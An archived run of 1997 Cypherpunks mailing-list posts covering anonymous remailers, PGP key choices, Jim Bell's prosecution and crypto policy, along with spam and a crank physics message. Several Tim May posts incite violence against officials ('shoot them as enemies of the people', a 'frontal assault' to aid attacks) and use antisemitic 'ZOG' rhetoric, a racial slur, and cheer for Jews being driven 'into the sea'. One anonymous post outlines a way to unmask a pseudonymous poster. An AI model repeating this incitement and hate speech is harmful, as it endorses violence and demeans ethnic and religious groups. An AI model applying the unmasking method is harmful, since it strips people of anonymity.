illegalization of tools to protect communications, and the "New World
Order" machinations. (These being the behind the scenes pressures being
applied to European and Asian governments, vis-a-vis Wasenaar, OECD, the
secret meetings, the Orwellian language the governments are adopting to
describe "trusted third parties (who actually provide keys to the
authorities without telling the customer)," etc.)

Not to mention the "felonization" of increasing numbers of things. Physical
things that were bought fully legally are now "contraband." Except to cops,
who are buying them in ever-increasing amounts. The sheeple, though, cannot
be trusted to own the things the cops own freely. And I'm talking about
more than just "compliance tools" (aka toilet plungers).

As to us being more violent, I think this is utter bullshit, "B." Read the
archived traffic of the list in the period surrounding the burning of the
illegal religion in Waco, Texas. Or the traffic after a wife and son were
killed by the cop criminal Lon Horiuchi (whom some militia members have
placed a bounty on...the Feds have apparently placed this killer into the
Witness Security Program, run, ironically, by the same U.S. Marshal's
Service now in charge of Jim Bell's detention!)

I think you, "B.," have just gotten a lot more nervous that what many of us
are advocating is in fact warfare against the State. I get e-mail from
folks who were once active on the Cypherpunks list saying, in various ways,
that they can no longer be as visible about their participation in the
list, for multiple reasons.

First, the rise of search engines, archives, and employers routinely
running DejaNews and other search engine checks on potential employees and
consultants to see what sorts of folks they are. (Whether being active on
the Cypherpunks list will nix a job is pretty unlikely, but it's still a
worry to some.)

Second, the apparent state of war between Cypherpunks and governments.
After recent actions by freedom fighters to bomb stooge facilities,
governments are treating "militias" as quasi-criminal organizations. (There
are many nuances to this point. In the U.S., I don't think such
organizations have been outlawed, as the Constitution remains a protection
of sorts. But many have been investigated, and, as John Young noted
recently, the IRS treats membership in certain organizations as a threat.
And there is Clinton's Anti-Terrorism Act, which explicitly makes certain
kinds of financial and other activities illegal, even by Americans, which
involve support of "terrorist" organizations. It is not inconceivable that,
following outlawing of strong crypto in various countries, that the
Cypherpunks group gets classified as an organization or group which
supports terrorist goals, which is almost certainly true.)

Third, some of those who make the most extreme calls for the killing of
Feds, the bombing of government operations in various nations, etc., are
using remailers. Isn't this exactly what remailers are likely to be used
for?

Fourth, the arrest and prosecution of Jim Bell, with tax evasion and a
minor stink bomb case turned into a "federal case" because of his
controversial views. This has obviously angered and radicalized many. Some
of us have stocked up on more asault weapons and shotguns, placed alarms
around our property, and we are expecting a "raid." As I have said, if
black-clad ninja raiders try to hit me, I'll assume they're "home invaders"
and will open fire. (A Sheriff's Deputy once told me that even saying I
would defend my home against unwelcome intruders constituted a "threat" and
that he might order a detachment to visit my compound. So far, two years
later, he hasn't made good on _his_ threat. And now I'm more ready for him
than ever.)

Fifth, the censorship fiasco  on the list angered many of us. After it
ended, many of us were no longer quite as willing to be "helpful." I, for
example, no longer write _any_ introductory essays, nor do I waste my time
encouraging people not to be too flamism. I used to occasionally do this,
filling a kind of "elder statesmen" or "eminence grise" role, as some
others expressed it. No more. If my posts were being censored, which they
were, then the removal of censorship caused me--and apparently others--to
"call a spade a spade." So when "DeathMonger" calls for the killing of
Feds, who am I to suggest this discussion be squelched? Forcible
censorship, once tried, often makes it effectively impossible for _any_
kind of guidance or advice along these lines. (This is an utterly
predictable outcome of attempts to censor.)

Finally, and to recap some of these points, when the Cypherpunks list and
group first started, many did not take the "collapse of government"
promises too seriously. Now, with even Louis Freeh and Janet Reno saying
that strong crypto represents a major and urgent threat to governments
(they call it "law enforcement" and "tax collection," and also talk about
threats of unregulated gambling, unregulated access to medical data,
uncontrolled communication between cult members, and so on), it seems that
the dangers of crypto anarchy are being more widely trumpeted.

This has the effect of making what we actually say here seem more
"plausibly scary." I don't know if this is why some are avoiding the list
now, or for other reasons (the list has never full recovered from the
censorship fiasco

So, "B.," stop apologizing for reading the list. You're already a marked
man in their eyes...and search engines can already identify the True Name
who is posting the last year or two as "Zooko Journeyman." In a couple of
years, all search engines will have "known aliases" macros to automatically
ferret out the web of pseudonyms linkable to a poster. You can run, but you
can't hide.

And "democracy" is spinning out of control, being used by authoritarians to
convert the world into a security state. Restrictions on travel, new drug
laws, laws against images and words on the Net, and thousands of new laws
every years.

A frontal assault, using strong crypto to aid in the attacks by freedom
fighters and to destablize authority, makes more sense. When a government
official decrees that citizen-units may no longer do certain things which
were once quite legal and quite common (such as owning a gun for defense),
that official must expect certain repercussions.

We're in a state of war with the statists and tyrants. It's what Jefferson
and the other Founders expected to happen, and now the watering with the
blood of patriots and tyrants is happening.

It's what the Founders expected.  Get used to it.

If crypto anonymity tools were available to the Founders, they'd have used
them against the British. Likewise, strong crypto is already being used by
the freedom fighters in Palestine against the Zionist Occupation
Government. That PGP 5.0 is being used by Hamas should send chills through
the ZOG in Jerusalem, and is probably why Cypherpunks is about to be
classed as a "terrorist group."

(What happened to the Jews in WW II was terrible, of course, but that was
no excused for forcibly evicting vast numbers of "sand niggers" so as to
make room for Jewish settlers. Their sons and grandsons will now end up
paying the price, as freedom fighters drive them into the sea. Broken eggs
and all.)

--Tim May




There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From ravage at ssz.com  Mon Aug 18 21:12:21 1997
From: ravage at ssz.com (Jim Choate)
Date: Tue, 19 Aug 1997 12:12:21 +0800
Subject: Cypherpunks as a Terrorist Organization (fwd)
Message-ID: <199708190406.XAA07590@einstein.ssz.com>



Forwarded message:

> Date: Mon, 18 Aug 1997 20:38:06 -0700
> From: Tim May 
> Subject: Cypherpunks as a Terrorist Organization

> It's what the Founders expected.  Get used to it.
> 
> If crypto anonymity tools were available to the Founders, they'd have used
> them against the British.

Uh, it was called a printing press and the pseudonym was 'publius'...


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From dformosa at st.nepean.uws.edu.au  Mon Aug 18 21:51:14 1997
From: dformosa at st.nepean.uws.edu.au (? the platypus {aka David Formosa})
Date: Tue, 19 Aug 1997 12:51:14 +0800
Subject: PGP5i supports RSA keys?
In-Reply-To: <19970817123643.13713.qmail@hotmail.com>
Message-ID: 



On Sun, 17 Aug 1997, David Downey wrote:

[...]

> Even though you can generate 
> RSALIB based keys, why do so when there is a newer and better algorythm 
> supplied with the 5.0?

I will be useing PGP to sign NoCeMs and I wish to maximise the number of
peaple will be able to use my posts.  For this I would have to use the old
size key untill PGP5.0 gets a signifigent market share.


Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep. Buy easter bilbies.
Save the ABC Is $0.08 per day too much to pay?   ex-net.scum and proud
I'm sorry but I just don't consider 'because its yucky' a convincing argument






From bdolan at USIT.NET  Mon Aug 18 21:52:12 1997
From: bdolan at USIT.NET (Brad Dolan)
Date: Tue, 19 Aug 1997 12:52:12 +0800
Subject: Tim May in the news
In-Reply-To: 
Message-ID: 



CBS must be going for the propaganda suck-up award this year.

Following tonight's "Chicago Hope," which dumped an immense wad of
socialist propaganda on us ("Health care is a right!"  "No one should ever
profit off a sick child."), the local news ran a CBS-produced feature
about the internet.  First half showed how cute bunny-rabbit cartoons
can educate your little hothouse genius.  Second half then explained how
there are {gasp} dirty *sex* sites out there that junior could
accidentally stumble across.  Obviously, something *must* be done.

Feature included a representative teen who manfully resists the temptation
to look at the feelthy pictures, 16-year-old Tim May of California.

I'm not making this up.

I wonder if it's an accident or a deliberate middle-finger from the
propagandists?

bd







From tcmay at got.net  Mon Aug 18 21:56:28 1997
From: tcmay at got.net (Tim May)
Date: Tue, 19 Aug 1997 12:56:28 +0800
Subject: Tim May in the news
In-Reply-To: 
Message-ID: 



At 9:35 PM -0700 8/18/97, Brad Dolan wrote:
>CBS must be going for the propaganda suck-up award this year.
>
>Following tonight's "Chicago Hope," which dumped an immense wad of
>socialist propaganda on us ("Health care is a right!"  "No one should ever
>profit off a sick child."), the local news ran a CBS-produced feature
>about the internet.  First half showed how cute bunny-rabbit cartoons
>can educate your little hothouse genius.  Second half then explained how
>there are {gasp} dirty *sex* sites out there that junior could
>accidentally stumble across.  Obviously, something *must* be done.
>
>Feature included a representative teen who manfully resists the temptation
>to look at the feelthy pictures, 16-year-old Tim May of California.
>
>I'm not making this up.
>
>I wonder if it's an accident or a deliberate middle-finger from the
>propagandists?

They finally aired that interview? I did that a couple of years ago.

I got my first Internet account when I was 12, about a year before I got
started in the Cypherpunks group.

But I'm 18 now, and fully authorized by the State to look at dirty
pictures, on or off the Net.

--Tim, yes, _that_ one.

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From stewarts at ix.netcom.com  Mon Aug 18 22:01:46 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 19 Aug 1997 13:01:46 +0800
Subject: Cypherpunks as a Poetic Terrorist Organization
In-Reply-To: <199708181919.VAA19973@xs2.xs4all.nl>
Message-ID: <3.0.2.32.19970818214553.03051708@popd.ix.netcom.com>



The paper today said something about a rash of "Poetic Terrorism"
going on in New Orleans.  Boxes of random poetry manifestoes showing
up around town, stuff tacked to billboards, toasters and other unexplained
objects in artistically arranged spaces, demands for official poetry-readings
by the police department.  A couple of suspects. 

Somebody's been reading Hakim Bey again....
	http://www.unicorn.com//lib/taz.html

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From tcmay at got.net  Mon Aug 18 22:10:42 1997
From: tcmay at got.net (Tim May)
Date: Tue, 19 Aug 1997 13:10:42 +0800
Subject: Anonymous Remailers
In-Reply-To: <3.0.3.32.19970818193205.007f61c0@mail.io.com>
Message-ID: 



At 8:44 PM -0700 8/18/97, Robert A. Costner wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I'd appreciate some EMAIL comments on what anonymous remailers are used for,
>in particular the remailer at anon.efga.org.
>
>The "Georgia Cracker" remailer, like any remailer, has had several people
>complain about it's existence.  While I've received various emails telling me
>the remailer is a bad thing, including veiled legal threats, I've yet to see
>even one note that tells why it is a good thing.  I'd appreciate some
>comments on why the system should be maintained.

You made a lot of hay about setting it up, if I recall correctly. If you
didn't know what remailers are, and what they protect, why did you set it
up?

More to the point, do you think anybody is now going to "break anonymity"
to tell you that anon.efga.org allowed them to notify the authorities that
their father was raping their baby sister? Or that it allowed Hamas
supporters to funnel technical information to drive the ZOG government out
of Jerusalem? Or whatever.

And if someone used a remailer to send you accounts of what anon.efga.org
was used for, would you trust these accounts?

Get a clue, man.

>There are two main reasons for this.  First, I need to explain to others at
>EFGA why this remailer is being maintained.  Secondly, I need to write an
>affidavit explaining why the remailer should not be shut down.  I'd really
>appreciate anyone who has used anon.efga.org EMAILing me with what purpose it
>serves.  Anonymous comments are of course very welcome.

An affidavit sounds like a legal statement. If you "need to write an
affidavit explaining why the remailer should not be shut down, " just who
is threatening to shut it down?

Tell them the anon.efga.org remailer is an important conduit for protecting
the secure communications of the Grand Wizards of the Ku Klux Klan, a
Georgia organization. If they balk, ask if the Klan does not have a right
of free speech and security in their papers and homes.

If they don't understand this, shoot them as enemies of the people.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From dformosa at st.nepean.uws.edu.au  Mon Aug 18 22:13:51 1997
From: dformosa at st.nepean.uws.edu.au (? the platypus {aka David Formosa})
Date: Tue, 19 Aug 1997 13:13:51 +0800
Subject: Nothing Accumulation Separation All
In-Reply-To: <199708180209.EAA24674@basement.replay.com>
Message-ID: 



On Mon, 18 Aug 1997, Anonymous wrote:

> Thee InterNet is not a collection of machines, but a social
> relation among people, mediated by *nothing*.

This is incorrect,  there are many things that meditate the interesctions
of peaple on the net.

> Thee InterNet is capital to such a degree of *accumulation*
> that it becomes a machine.

So what?  Even though it could be viewed this way it is made up of
autonmouse units.  Talking about a great mystical thing called 'The
internet' is only sutable for Wired Journolists.

Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep. Buy easter bilbies.
Save the ABC Is $0.08 per day too much to pay?   ex-net.scum and proud
I'm sorry but I just don't consider 'because its yucky' a convincing argument






From nobody at REPLAY.COM  Mon Aug 18 22:34:37 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Tue, 19 Aug 1997 13:34:37 +0800
Subject: CBS
In-Reply-To: 
Message-ID: <199708190521.HAA17236@basement.replay.com>



On Tue, 19 Aug 1997, Brad Dolan wrote:

> CBS must be going for the propaganda suck-up award this year.

> Second half then explained how there are {gasp} dirty *sex* sites out
> there that junior could accidentally stumble across.  Obviously,
> something *must* be done. 

 * Something must be done.
 * This is something.
 * Therefore, we must do it.

 (Yes, Prime Minister?)

::Boots






From nobody at REPLAY.COM  Mon Aug 18 22:54:05 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Tue, 19 Aug 1997 13:54:05 +0800
Subject: Remailer hating Nazis
In-Reply-To: <199708180834.KAA03366@basement.replay.com>
Message-ID: <199708190536.HAA18993@basement.replay.com>



"Anonymous ReMonger" wrote:

> > If you believe that any computer sytem is foolproof... you have a lot to
> > learn.  There is always a possibility that people will found out your real
> > identity and where you live, through a human error or a flaw in the
> > remailer.  (Right, toto?).
> 
>   Right, small, warm-blooded creature.
>  
>   There are a plethora of available avenues for surruptitious agents to
> exploit InterNet technology and methodology in order to reveal both your
> identity and the content of your communications.
>   To truly achieve anonymity and privacy, one should be prepared to use
> the strictest standards of paranoia, the full capabilities of privacy
> and anonymity tools, and personal methodologies aimed at thwarting
> unlikely and/or impossible surveillance techniques as well as the
> currently known methods.

And even then one must never trust it completely.  An appropriate degree
of paranoia means that not only must one use all the appropriate tools and
techniques, but that one must be prepared for the possibility that the
tools may fail. 

>   Beyond the mere technology itself, one must consider the possibile
> use of psychological manipulation of individuals and groups into a
> specific mindset that, combined with an analysis of the individual's
> natural psychological profile, can enable a surreptitious entity to
> move the individual toward patterns or processes which will make
> the technological tools of identity and information analysis more
> effective.

Following is a fairly obvious scenario, but still perhaps interesting:

Imagine that an agent X wants to find out the real identity of
somebody posting under the pseudonym A.  X can retrieve the list
membership through the mailserver.

X composes a post to the list designed to elicit a response from A,
perhaps flaming A, or criticising something dear to A.  They prepare n
variations of the post by inserting different spacing, spelling, or
phrasing and keep track of each variation.  They post one variation to
each member, relayed through toad.com.

If X is lucky, A will reply to the post (not noticing the slightly
unusual header), quoting some of the original matter.  By looking at
the spelling etc in the quoted part X can determine which original
version A received and hence what address they use to read the list.

Now this is by no means certain to work: A might not reply, they might
not quote enough material to allow the original to be identified, or
they might notice that the mail is not really from the list.  Even if
X can associate the reply with an original, they have no really
conclusive evidence, but then...

>   This fictitious example, if it came to pass, would serve to
> provide information to the agent which could be used to more
> effeciently target those who would be subjected to more restricted
> forms of surveillance, such as monitoring of the physical signals
> given off by their computer, keyboard, and monitor.

It has, perhaps, only a ten percent chance of success, but this is
nevertheless significant.  If A is posting anonymously just for the
convenience of not having his/her email address dredged up by search
engines, or from broadly-based monitoring this is perhaps OK.  If A
writes against people or governments that might retaliate, then A
should at least consciously accept the risks.

>   All in all, the small, warm-blooded creature is correct in
> implying that one should always keep a shotgun by their computer, in
> the firm knowledge that the dogs of war do not always bark to
> announce their omnipresence.

Nicely put.

> > Greets to all my friends in domestic surveilance.
> 
>   And greets to all of my friends who are watching your friends.

That's good to know.  Some of them need to be watched.

::Boots

  "You will find that the State is the kind of organization which,
   though it does big things badly, does small things badly too."  
                                        -- John Kenneth Galbraith






From Michael.Johnson at mejl.com  Mon Aug 18 23:26:04 1997
From: Michael.Johnson at mejl.com (Mike)
Date: Tue, 19 Aug 1997 14:26:04 +0800
Subject: PGP5i supports RSA keys?
In-Reply-To: <19970817123643.13713.qmail@hotmail.com>
Message-ID: <3.0.3.32.19970819080948.009b9190@localhost>



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

? the platypus {aka David Formosa} wrote:
>I will be useing PGP to sign NoCeMs and I wish to maximise
>the number of peaple will be able to use my posts.  For this I
>would have to use the old size key untill PGP5.0 gets a
>signifigent market share.

That thinking is backwards. If you sign with a DSS key, you will
increase PGP5 usage, not the other way around. Anybody is able
to run PGP5 today on Win32/Mac/Linux. If you can't get access
to at least one of those platforms, then you're not much of a
cypherpunk, are you?

Mike.

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBM/lGcsUc8bdD9cnfEQKYXgCfVd66SFwpZEqcMkUHlOx/Spt0JMAAnRP5
B4QDOT2JroYGSkhd2tOo8N8/
=tUkm
-----END PGP SIGNATURE-----


Mike.






From nobody at REPLAY.COM  Tue Aug 19 00:51:12 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Tue, 19 Aug 1997 15:51:12 +0800
Subject: The Real Bell Issue / Re: Bell, etc
Message-ID: <199708190730.JAA00747@basement.replay.com>



Mike Duvos wrote:
> Jim Bell is an example of an individual screwed by the government
> using overly vague statues for alleged crimes which amounted to
> little more than a few high school type pranks.
> 
> He took names of assholes who harrassed him, gave a made-up
> number to a few people, and made the IRS doormat smell bad.  How
> much, if any taxes, were evaded as a result of one of these
> charges isn't even an issue.

The following, from the Columbian, lies at the heart of the
real issue that Bell's persecution was all about.

> According to the affidavit, Bell came to the attention of the 
> Internal Revenue Service in November when he sent the agency's 
> Ogden (Utah) Service Center a letter asking for a tax refund. 

  Every year, just before Income Taxes are due, the IRS picks out
a few people to unjustly persecute in order to strike fear into
the heart of the taxpaying sheeple.
  They always manage to completely fuck over a variety of citizens
in a manner that will generate maximum publicity at that time of
year. They always seem to include at least one fairly average
citizen who gets everything he owns seized, including bank accounts,
etc., over a tax dispute involving nickles and dimes. Those who
express outrage over these actions are the IRS's best friend.
  "They have no right to..."
  "They are out of control..."
  "They can do anything they want to you..."
  This is all music to the IRS's ears.

  Jim Bell was like manna from heaven for the IRS. It gave them an
opportunity to bring down the fascist forces of a wide variety of
government agencies to back the IRS's play in this instance.
  Bell's persecution was not a mistake, it was a loud and clear
message to the taxpaying sheeple that they are "a felon under an
increasing number of laws," and that the IRS has a plethora of
government agencies ready and willing to join them in fucking 
over anyone who gets out of line.

  And what is the IRS's definition of "getting out of line?":
> According to the affidavit, Bell came to the attention of the 
> Internal Revenue Service in November when he sent the agency's 
> Ogden (Utah) Service Center a letter asking for a tax refund. 

  Apply for a tax refund and have every real or imagined sin you
have ever commited used against you.
  "A person who asked the IRS for a tax refund, had his home raided
today by 20 armed government terrorists from a wide variety of
government agencies.
  "This person who asked for a TAX REFUND has never been proven to
have anything to do with DRUGS such as METHAMPHETAMINE, and is not
known to be a SPEED FREAK or a DRUG DEALER. As well, government
agents investigating the person asking for the TAX REFUND have
never found any ILLEGAL DRUGS on his person or property, but the
person who asked for the TAX REFUND will be mentioned in connection
with DRUGS and METHAMPETAMINE, or SPEED, CRANK, etc., for the rest
of his life, every time he "comes to our attention" as a result
of asking for a TAX REFUND."

  I would not doubt that the IRS asked the local newspapers to put
a picture on their front page of 20 armed governement terrorists 
putting guns to the heads of Ma and Pa Bell, with Jim on the ground
with a boot at his throat, and a huge headline reading,
  "MAN ASKS FOR TAX REFUND!"

  The IRS spends the whole year going after people who they deem
to be guilty of tax evasion, and it is usually a fairly boring
affair involving accountants and lawyers.
  The weeks preceeding the date taxes are due to be filed are
reserved for high-profile cases which the sheeple can easily
recognize as persecution by a heartless agency with supreme power
at their disposal.
  The real issue in Bell's case is not just persecution, but easily
recognizable persecution. Otherwise, the whole Bell affair would be
pointless.

  Perhaps, upon sentencing, we will see a headline,
  "MAN WHO ASKED FOR TAX REFUND IMPRISONED FOR HIGH SCHOOL PRANKS!"

TruthMonger






From rootadmin at CyberSpaceTechnologies.com  Tue Aug 19 02:40:58 1997
From: rootadmin at CyberSpaceTechnologies.com (David D.W.Downey)
Date: Tue, 19 Aug 1997 17:40:58 +0800
Subject: [Fwd: Your newsgroup post ...]
Message-ID: <33F99E5C.13D23503@cyberspacetechnologies.com>



blackjack at hotmail.com wrote:

> Saw your post in the newsgroups.
>
> Check this out!
>
> http://www.geocities.com/Eureka/Plaza/1022

  Ya know, this shit really pisses me off. I understand that we have to
protect everyone's rights if we wish are own to be protected. This is a
classic case of what is causing the mainstream public to hash so hard
about porn and such. I did nothing to solicit this beyond posting to a
news group. This troller comes along, scarfs my email address and then
sends me this email. If you click on the link it sends you to a place to
sign up for accessing a hard porn site. This is what feeds the initiated
Johnnie Q.Public's desire to control the net, and endangers all of our
rights on the net. I understand that we have to protect the enemies'
rights too, but can't we just shoo a few of them first? Lowers the
numbers needing protection and might help us out in the end.
Grrrrrrr!!!!


David Downey

[ If we, as humans, are so omnipotent how come we scurry like rats when
a tornado hits? ]






From blancw at cnw.com  Tue Aug 19 02:43:47 1997
From: blancw at cnw.com (Blanc)
Date: Tue, 19 Aug 1997 17:43:47 +0800
Subject: Bell, etc
Message-ID: <3.0.32.19970819024013.00a3c690@cnw.com>




Well, Mike, you've called for someone to take up the responsibility to go
through the trouble to set up a web page with stories on Jim, numerous
links to other Jim Bell info, and constant updates on his situation, plus
almost glorified him in your assessment of what happened to him.   Your
signature declares "{Free Cypherpunk Political Prisoner Jim Bell}".

Yet you haven't emailed your interest in visiting Jim, nor did you
volunteer to do any research, like I did, to find out where he is, how to
contact him, when to visit, etc. - and you live around here, you told me.

What's the deal?

    ..
Blanc






From Rlavelle7 at aol.com  Tue Aug 19 17:58:19 1997
From: Rlavelle7 at aol.com (Rlavelle7 at aol.com)
Date: Tue, 19 Aug 1997 17:58:19 -0700 (PDT)
Subject: THE   UNIVERSE
Message-ID: <199708200057.UAA28634@andrew.cais.com>


                                                   THE   UNIVERSE
           2
 E=MC   The equation for the atom bomb. It says that matter and energy are the
 same thing. So then what is that? Matter, look at a brick. Its in a three dimensional
 form. Its made of electrons, protons and neutrons (atoms) and they are moving so
 the brick is moving. Energy,sunlight. Its in a three dimensional form. It comes to us
 from the sun therefore it is moving. 3D and moving Both matter and energy are 3D
 and moving. I outproduce Einstein. We already know all matter has gravity. The
 bending of light shows that energy has gravity also. So matter and energy are
 3D moving with gravity. The universe is made of matter, energy, time and space.
 That just stated is the matter and energy part. Time and space. Take everything
 in the universe and stop it. Does time progress? No. Therefore time is the motion
 and the understanding of all the motion is the understanding of all of time.
 Space, it ends. Space does not go on forever. Space is in a three dimensional
 form. It moves but does not have gravity. Space moves like this.  O  /\  +  \/  O
 And that is the understsanding of all of time.   
    O   This is what was first in the beginning.
   /\   This is the old kings and queens.
    +   This is democracy.
   \/   This is socialism.
   O   This is when the Lord Jesue Christ returns.
 And that is the understanding of the universe. Glory be to the Father the Son
 and the Holy Ghost. Revelation chapter 10 & 11; 15 - 19.  It is very important
 the people receive this information. You may tell someone about this.
                                                                     Thank You
                                                                   Robert Lavelle






From 03169083 at c-corp.net  Tue Aug 19 19:04:19 1997
From: 03169083 at c-corp.net (03169083 at c-corp.net)
Date: Tue, 19 Aug 1997 19:04:19 -0700 (PDT)
Subject: DO YOU WAGER/ GAMBLE ON SPORTS ???
Message-ID: <567vfuy5656mhh.anti.spamers.r.totalitarian.communists@winners.cam>




if you are not a sports bettor ... just delete this message


DO YOU WAGER ON SPORTS ??


If you WAGER on Sporting events MR ACTION would like to send you a free pick everyday!!!

That's right!!!  EVERYDAY During the next four months MR ACTION will email you information on a 

key game being played that night.

FOOTBALL usually, sometimes BASEBALL, and sometimes BASKETBALL.

MR ACTION IS CORRECT ABOUT 70 % of the time!!!!

HOW DO YOU GET THESE SELECTIONS ???

EASY..... JUST HIT REPLY TO THIS LETTER AND PUT SUBSCRIBE IN THE MESSAGE BODY!!

THAT'S IT!!!! .... OR  CLICK HERE

NO MONEY TO SPEND .... NO NAME OR PHONE NUMBER REQUIRED .... NO CREDIT CARD ASKED FOR!!!!

IF YOU WAGER ON SPORTS I WANT TO HELP YOU WIN BIG $$$$


>>>> JUST REPLY TO THIS EMAIL AND SAY "SUBSCRIBE" ... OR ...

  CLICK HERE










From pooh at efga.org  Tue Aug 19 06:03:44 1997
From: pooh at efga.org (Robert A. Costner)
Date: Tue, 19 Aug 1997 21:03:44 +0800
Subject: Anonymous Remailers
In-Reply-To: <3.0.3.32.19970818234422.038013f4@mail.atl.bellsouth.net>
Message-ID: <3.0.3.32.19970819085033.0339cb94@mail.atl.bellsouth.net>



Once again Tim's ability to convey information befuddles my ability to respond.

While I would support Tim's suggestion that the KKK has as much right to use an anonymous remailer as much as anyone, Tim doesn't provide much help here.  When  looking into which court to sue Georgia in over anonymity, we had a choice between Federal Court and State court.  While the Georgia's 11th district Federal court has been pro free speech and we thought would favor anonymity, the state court has not been so respectful of the constitution.  The Georgia State court's last ruling on anonymity was to declare that anonymity was illegal.  The case in point is that a KKK member wanted to wear his mask in public.  As is the case in several states, Georgia passed a law declaring the use of a mask to be illegal.  This was upheld by the state supreme court.

The real problem here was not anonymity, but the use of the KKK as a representation of why anonymity should be allowed.  Had this been a 10 year old in a Halloween mask on the last day of October, the case would surely have gone differently.  So much for the conceptual reasons why Tim's comment does not help.  On a more "where the rubber hits the road" view, Tim's comment fails on the grounds that he apparently has nothing to do with the Georgia KKK.

In Georgia, while we have won a temporary injunction and assume we will see the law fully struck down, EFGA is still involved in lawsuit against the state over internet anonymity.  I actually don't contemplate another affidavit in this case, but it may happen.  If I need to write another affidavit in support of the remailer, I will only have about two weeks to get it done.  We hope the Georgia lawsuit will resolve itself in another 30 days or so.

I'm actually more concerned about action against the remailer itself.  I wouldn't be surprised to be approached concerning criminal charges against myself concerning the remailer's operation.  We began discussing this with attorneys and others more than a year ago.

I have no idea what the court would make of my submission of material I received anonymously.  While I could submit "I have been told....", "I have received comments that tell me...", I can't personally testify under oath to Tim's example of removing the ZOG gov't.  I can state that I've been told the remailer has been used for purposes that I wouldn't personally approve of and express my apologies to parents of a particular little girl.  The fact remains that unsolicited feedback on the system has not been good comments.  We could use a good story or two.

Another issue is internal in the operation of the remailer itself.  While I'm not the only one involved in the operation of the remailer, I get called on to defend it's existence.  The question of why to have a remailer, and the question of why to set up and run a remailer are two different things.  The remailer sounds good in theory.  Actual operation of the system is a different thing entirely.  The remailer is more than just a pain.  It is a time-bomb waiting to go off.

If anyone has any comments on how they have used the Georgia Cracker remailer, I'd appreciate the comments being emailed to me.  Anonymously or not.

  -- Robert, pooh at efga.org

At 10:06 PM 8/18/97 -0700, Tim May wrote:
>You made a lot of hay about setting it up, if I recall correctly. If you
>didn't know what remailers are, and what they protect, why did you set it
>up?
>
>More to the point, do you think anybody is now going to "break anonymity"
>to tell you that anon.efga.org allowed them to notify the authorities that
>their father was raping their baby sister? Or that it allowed Hamas
>supporters to funnel technical information to drive the ZOG government out
>of Jerusalem? Or whatever.
>
>And if someone used a remailer to send you accounts of what anon.efga.org
>was used for, would you trust these accounts?
...
>An affidavit sounds like a legal statement. If you "need to write an
>affidavit explaining why the remailer should not be shut down, " just who
>is threatening to shut it down?
>
>Tell them the anon.efga.org remailer is an important conduit for protecting
>the secure communications of the Grand Wizards of the Ku Klux Klan, a
>Georgia organization. If they balk, ask if the Klan does not have a right
>of free speech and security in their papers and homes.






From JonWienk at ix.netcom.com  Tue Aug 19 07:40:21 1997
From: JonWienk at ix.netcom.com (Jonathan Wienke)
Date: Tue, 19 Aug 1997 22:40:21 +0800
Subject: Anonymous Remailers
In-Reply-To: <3.0.3.32.19970818193205.007f61c0@mail.io.com>
Message-ID: <3.0.2.32.19970818211433.00694684@popd.netcruiser>



Is there any Eudora plug-in that allows anyone using Eudora to operate a
remailer?  I would think that if anyone with Eudora and an email account
can chain remail PGP encrypted messages for others a la mixmaster, etc. it
would be much harder to shut down 40,000 remailers tham 40.

Jonathan Wienke

What part of "the right of the people to keep and bear Arms, shall not be
infringed" is too hard to understand? (From 2nd Amendment, U.S. Constitution)

PGP 2.6.2 RSA Key Fingerprint: 7484 2FB7 7588 ACD1  3A8F 778A 7407 2928
DSS/D-H Key Fingerprint: 3312 6597 8258 9A9E D9FA  4878 C245 D245 EAA7 0DCC
Public keys available at pgpkeys.mit.edu. PGP encrypted e-mail preferred.

US/Canadian Windows 95/NT or Mac users:
Get Eudora Light + PGP 5.0 for free at http://www.eudora.com/eudoralight/
Get PGP 5.0 for free at http://bs.mit.edu:8001/pgp-form.html
Commercial version of PGP 5.0 and related products at http://www.pgp.com
Eudora + PGP = Free, Convenient Communication Privacy

Go postal! Write your mommy a letter!






From rah at shipwright.com  Tue Aug 19 07:42:01 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 19 Aug 1997 22:42:01 +0800
